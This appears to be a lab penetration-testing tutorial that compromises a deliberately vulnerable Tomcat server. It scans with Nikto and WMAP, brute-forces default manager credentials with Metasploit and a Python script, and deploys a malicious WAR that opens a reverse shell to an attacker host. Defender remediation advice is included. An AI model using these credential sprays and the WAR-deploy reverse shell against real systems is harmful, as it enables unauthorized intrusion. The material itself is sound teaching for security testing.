
Penetrating Systems on the (Vulnerable) GNU/Linux Platform with the Metasploit Framework – Part VII

BASIC CONCEPTS OF PENETRATION TESTING ON THE (VULNERABLE) GNU/LINUX PLATFORM USING THE METASPLOIT FRAMEWORK – PART VII
Attacking a Vulnerable Tomcat Server

Finding Vulnerabilities in the Tomcat Server (Port 8180)

As with the Apache server in the previous part, a similar approach is followed here: look for some vulnerability with Nikto and WMAP, then try to exploit it.

Nikto:

The results of the Nikto scan were:

>nikto.pl -h 192.168.1.34:8180
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.1.34
+ Target Hostname:    192.168.1.34
+ Target Port:        8180
+ Start Time:         2011-05-22 01:03:42
---------------------------------------------------------------------------

+ Server: Apache-Coyote/1.1

+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)

+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat

+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS

+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.

+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.

+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.

+ /: Appears to be a default Apache Tomcat install.

+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.

+ OSVDB-3092: /admin/: This might be interesting…

+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.

+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.

+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.

+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.

+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.

+ /admin/account.html: Admin login page/section found.

+ /admin/controlpanel.html: Admin login page/section found.

+ /admin/cp.html: Admin login page/section found.

+ /admin/index.html: Admin login page/section found.

+ /admin/login.html: Admin login page/section found.

+ /servlets-examples/: Tomcat servlets examples are visible.

+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host

+ End Time: 2011-05-22 01:05:14 (92 seconds)

—————————————————————————

+ 1 host(s) tested

WMAP:

The results of the WMAP scan were:

>wmap_run -t 192.168.1.34:8180
[*] Testing target:
[*] Site: 192.168.1.34 (192.168.1.34)
[*] Port: 8180 SSL: false
============================================================
[*] Testing started. Sat May 21 01:00:44 +0200 2011
=[ SSL testing ]=
============================================================

[*] Target is not SSL. SSL modules disabled.

=[ Web Server testing ]=

============================================================

[*] Loaded auxiliary/scanner/http/options …

[*] Loaded auxiliary/scanner/http/open_proxy …

[*] Loaded auxiliary/scanner/http/http_version …

[*] Loaded auxiliary/scanner/http/frontpage_login …

[*] Loaded auxiliary/scanner/http/vhost_scanner …

[*] Loaded auxiliary/admin/http/tomcat_utf8_traversal …

[*] Loaded auxiliary/admin/http/contentkeeper_fileaccess …

[*] Loaded auxiliary/scanner/http/webdav_internal_ip …

[*] Loaded auxiliary/scanner/http/robots_txt …

[*] Loaded auxiliary/scanner/http/webdav_website_content …

[*] Loaded auxiliary/scanner/http/webdav_scanner …

[*] Loaded auxiliary/scanner/http/svn_scanner …

[*] Loaded auxiliary/admin/http/tomcat_administration …

[*] Loaded auxiliary/scanner/http/web_vulndb …

[*] Loaded auxiliary/scanner/http/verb_auth_bypass …

=[ File/Dir testing ]=

============================================================

[*] Loaded auxiliary/scanner/http/ms09_020_webdav_unicode_bypass …

[*] Loaded auxiliary/scanner/http/file_same_name_dir …

[*] Loaded auxiliary/scanner/http/writable …

[*] Loaded auxiliary/scanner/http/copy_of_file …

[*] Loaded auxiliary/scanner/http/backup_file …

[*] Loaded auxiliary/scanner/http/replace_ext …

[*] Loaded auxiliary/scanner/http/brute_dirs …

[*] Loaded auxiliary/scanner/http/files_dir …

[*] Loaded auxiliary/scanner/http/dir_scanner …

[*] Loaded auxiliary/scanner/http/dir_listing …

[*] Loaded auxiliary/scanner/http/prev_dir_same_name_file …

[*] Loaded auxiliary/scanner/http/dir_webdav_unicode_bypass …

[*] Loaded auxiliary/scanner/http/trace_axd …

=[ Unique Query testing ]=

============================================================

[*] Loaded auxiliary/scanner/http/blind_sql_query …

[*] Loaded auxiliary/scanner/http/error_sql_injection …

=[ Query testing ]=

============================================================

=[ General testing ]=

============================================================

[*] Analysis completed in 12.7628588676453 seconds.

[*] Done.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

db_vulns

[*] Time: Thu Mar 24 23:17:45 UTC 2011 Vuln: host=192.168.1.34 name=exploit/multi/browser/java_signed_applet refs=URL-http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf

[*] Time: Fri May 20 22:29:14 UTC 2011 Vuln: host=192.168.1.34 name=exploit/unix/webapp/tikiwiki_graph_formula_exec refs=CVE-2007-5423,OSVDB-40478,BID-26006

At first glance WMAP has not detected any additional vulnerability on this server (the two entries that db_vulns lists predate this scan and refer to other services found earlier in the series), whereas Nikto has provided more information; that information is worked through in the following steps.
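Two of the findings above can be checked without Metasploit: the Allow header Nikto reported (PUT, DELETE and TRACE being accepted) and whether the manager application still answers to one of Tomcat's default username/password pairs, which is exactly what the tomcat_mgr_login module in the steps below automates. The following script is an added example, not code from the original post; it runs offline against a constructed stand-in for the lab Tomcat that is part of the script (its OPTIONS answer and the Basic-auth realm on /manager/html mirror what the page shows, and tomcat:tomcat is, by assumption, the only pair it accepts). Point `allowed_methods` and `spray_manager` at a real base URL such as http://192.168.1.34:8180 to use it against the lab target.

```python
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Default pairs in the order the page's tomcat_mgr_login run tried them.
DEFAULT_PAIRS = [
    ("admin", "admin"), ("manager", "manager"), ("role1", "role1"),
    ("root", "root"), ("tomcat", "tomcat"), ("both", "both"),
    ("j2deployer", "j2deployer"),
]
# Verbs Nikto flagged from the Allow header (OSVDB-397, OSVDB-5646, TRACE).
RISKY_METHODS = {"PUT", "DELETE", "TRACE"}


class FakeTomcatManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the lab Tomcat: answers OPTIONS with the
    Allow header Nikto saw and guards /manager/html with Basic auth whose
    only valid pair is tomcat:tomcat (an assumption mirroring the page)."""
    server_version = "Apache-Coyote/1.1"
    sys_version = ""
    VALID_TOKEN = "Basic " + base64.b64encode(b"tomcat:tomcat").decode()

    def log_message(self, *args):
        pass  # keep the example quiet

    def _reply(self, code, body=b"", extra=()):
        self.send_response(code)
        for name, value in extra:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, extra=[("Allow", "GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS")])

    def do_GET(self):
        if self.path != "/manager/html":
            return self._reply(404)
        if self.headers.get("Authorization") == self.VALID_TOKEN:
            return self._reply(200, b"<title>/manager</title>Tomcat Web Application Manager")
        self._reply(401, extra=[("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')])


def start_fake_tomcat():
    """Bind the stand-in on a free loopback port; returns (server, base_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakeTomcatManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def allowed_methods(base_url):
    """Send OPTIONS / and parse the Allow header into a set of verbs."""
    req = urllib.request.Request(base_url + "/", method="OPTIONS")
    with urllib.request.urlopen(req, timeout=5) as resp:
        allow = resp.headers.get("Allow", "")
    return {verb.strip().upper() for verb in allow.split(",") if verb.strip()}


def try_manager_login(base_url, username, password):
    """One Basic-auth attempt on /manager/html; True only for HTTP 200."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(base_url + "/manager/html",
                                 headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:      # 401/403 (or anything else) means no access
        return False


def spray_manager(base_url, pairs=DEFAULT_PAIRS):
    """Return the first (username, password) pair the manager accepts, else None."""
    for username, password in pairs:
        if try_manager_login(base_url, username, password):
            return (username, password)
    return None


if __name__ == "__main__":
    server, url = start_fake_tomcat()
    methods = allowed_methods(url)
    print("Allow:", ", ".join(sorted(methods)))
    print("risky:", ", ".join(sorted(methods & RISKY_METHODS)))
    print("manager login:", spray_manager(url))
    server.shutdown()
```

Every failed attempt lands in the Tomcat access log with the source address, so on a real engagement keep the list short and deliberate rather than throwing a full wordlist at the manager; a 401 with the `Tomcat Manager Application` realm is also the quickest confirmation that the manager is deployed at all, before any credential is tried.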

  1. Nikto reported WebDAV support (the /webdav/index.html context), but that finding comes from a path check and does not prove the WebDAV methods are actually enabled, so a dedicated scan is run to determine whether it is active:
    msf > use auxiliary/scanner/http/webdav_scanner
    msf auxiliary(webdav_scanner) > show options

    Module options (auxiliary/scanner/http/webdav_scanner):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       Proxies                   no        Use a proxy chain
       RHOSTS                    yes       The target address range or CIDR identifier
       RPORT    80               yes       The target port
       THREADS  1                yes       The number of concurrent threads
       VHOST                     no        HTTP server virtual host

    msf auxiliary(webdav_scanner) > set RHOSTS 192.168.1.34
    RHOSTS => 192.168.1.34
    msf auxiliary(webdav_scanner) > set RPORT 8180
    RPORT => 8180
    msf auxiliary(webdav_scanner) > run
    [*] 192.168.1.34 (Apache-Coyote/1.1) WebDAV disabled.
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    The scanner reports that WebDAV is disabled on the web server, so a different path has to be taken.

  2. On the other hand, the /admin context has no access restriction at all, so it could be a way into the service; accordingly, the available Tomcat modules and exploits are searched for.
msf > search tomcat
[*] Searching loaded modules for pattern 'tomcat'...

Auxiliary
=========

   Name                                       Disclosure Date  Rank    Description
   ----                                       ---------------  ----    -----------
   admin/http/tomcat_administration                            normal  Tomcat Administration Tool Default Access
   admin/http/tomcat_utf8_traversal                            normal  Tomcat UTF-8 Directory Traversal Vulnerability
   dos/http/apache_tomcat_transfer_encoding   2010-07-09       normal  Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   scanner/http/tomcat_enum                                    normal  Apache Tomcat User Enumeration
   scanner/http/tomcat_mgr_login                               normal  Tomcat Application Manager Login Utility

Exploits
========

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   multi/http/tomcat_mgr_deploy   2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution

  3. With this list, the modules were tried to determine which one could provide access to the server, starting with the manager login utility (the lab target answers at 192.168.1.35 in this session rather than the 192.168.1.34 scanned above):
    msf > use auxiliary/scanner/http/tomcat_mgr_login
    msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.35
    RHOSTS => 192.168.1.35
    msf auxiliary(tomcat_mgr_login) > set RPORT 8180
    RPORT => 8180
    msf auxiliary(tomcat_mgr_login) > exploit
    [*] 192.168.1.35:8180 - Trying username:'admin' with password:'admin'
    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
    [*] 192.168.1.35:8180 - Trying username:'manager' with password:'manager'
    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
    [*] 192.168.1.35:8180 - Trying username:'role1' with password:'role1'
    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
    [*] 192.168.1.35:8180 - Trying username:'root' with password:'root'
    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
    [*] 192.168.1.35:8180 - Trying username:'tomcat' with password:'tomcat'
    [+] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
    [*] 192.168.1.35:8180 - Trying username:'both' with password:'both'
    [-] http://192.168.1.35:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
    [*] 192.168.1.35:8180 - Trying username:'j2deployer' with password:'j2deployer'
    [-] http://192.168.1.35:8180/manager/html not responding
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

  4. The service's credentials are weak (a default username and password pair), which makes it an easy target; with them it is now possible to run an exploit that deploys a malicious WAR on the web server.
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT                      yes       The target port
   USERNAME                   no        The username to authenticate as
   VERBOSE   false            no        Enable verbose output
   VHOST                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.35
RHOST => 192.168.1.35
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(tomcat_mgr_deploy) > set LPORT 4445
LPORT => 4445
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.33:4445
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 1686 bytes as mIQsM4f3wRq.war ...
[*] Executing /mIQsM4f3wRq/p7yJxxlHe9RoBOEIUaO0Bc5vGrFfi.jsp...
[*] Undeploying mIQsM4f3wRq ...
[*] Command shell session 2 opened (192.168.1.33:4445 -> 192.168.1.35:40989) at Sat May 21 22:02:08 +0200 2011

whoami
tomcat55

The malicious WAR has been deployed and with it a reverse shell session has been obtained between the remote machine and the attacker's machine. Note that the shell runs as the unprivileged tomcat55 account, not as root, so reaching root would still require a separate privilege escalation step. From the defender's side the root cause is a default tomcat:tomcat pair left in tomcat-users.xml combined with a manager application reachable from the network; removing the default accounts and restricting access to /manager (and to the unprotected /admin context) closes this path.
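To make the deploy step less of a black box, the following added example (not code from the original post and not the Metasploit module's own code) builds the same kind of artifact tomcat_mgr_deploy uploads, a WAR archive containing WEB-INF/web.xml and a single JSP, and describes the two manager requests the module's PATH option refers to: PUT /manager/deploy?path=/<context> with the WAR as the body to upload it, and GET /manager/undeploy?path=/<context> to remove it afterwards, both with Basic authentication. The JSP here only prints the account Tomcat runs as, the equivalent of the whoami above, instead of a shell stager; the base URL, context name and credentials are the page's lab values passed in as parameters, and the script sends nothing on the network.

```python
import base64
import io
import zipfile
from urllib.parse import quote

# Deployment descriptor; Tomcat 5.5 expects one inside every WAR.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <display-name>{context}</display-name>
</web-app>
"""

# Benign JSP: reports the OS account the container runs as (the page's
# session showed 'tomcat55'). tomcat_mgr_deploy would put a shell stager here.
JSP_BODY = '<%= "running as " + System.getProperty("user.name") %>\n'


def build_war(context, page="index.jsp"):
    """Return the bytes of a WAR (a zip) holding WEB-INF/web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(context=context))
        war.writestr(page, JSP_BODY)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive members, the check to make before anything is uploaded."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def basic_auth(username, password):
    """Authorization header value the manager expects (HTTP Basic scheme)."""
    return "Basic " + base64.b64encode(f"{username}:{password}".encode()).decode()


def deploy_request(base_url, context, war_bytes, username, password,
                   manager_path="/manager"):
    """Describe the upload: PUT <manager_path>/deploy?path=/<context>, WAR as body."""
    return {
        "method": "PUT",
        "url": f"{base_url}{manager_path}/deploy?path=/{quote(context)}",
        "headers": {
            "Authorization": basic_auth(username, password),
            "Content-Type": "application/octet-stream",
            "Content-Length": str(len(war_bytes)),
        },
        "body": war_bytes,
    }


def undeploy_request(base_url, context, username, password, manager_path="/manager"):
    """Describe the cleanup call the module issues once the JSP has run."""
    return {
        "method": "GET",
        "url": f"{base_url}{manager_path}/undeploy?path=/{quote(context)}",
        "headers": {"Authorization": basic_auth(username, password)},
    }


def jsp_url(base_url, context, page="index.jsp"):
    """Where the deployed page answers once the manager has expanded the WAR."""
    return f"{base_url}/{quote(context)}/{page}"


if __name__ == "__main__":
    base = "http://192.168.1.35:8180"          # lab target from the page
    war = build_war("demo")
    print("WAR members:", war_entries(war), "size:", len(war))
    req = deploy_request(base, "demo", war, "tomcat", "tomcat")
    print(req["method"], req["url"], req["headers"]["Authorization"])
    print("then GET", jsp_url(base, "demo"))
    print("cleanup:", undeploy_request(base, "demo", "tomcat", "tomcat")["url"])
```

To actually send the upload, hand the dictionary to `urllib.request.Request(req["url"], data=req["body"], headers=req["headers"], method=req["method"])`; the manager answers with a one-line `OK - Deployed application at context path /demo` on success. The undeploy call is worth keeping even in a lab, since a forgotten WAR is a persistent backdoor that the next tester (or an attacker) will find exactly the way this one was found.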
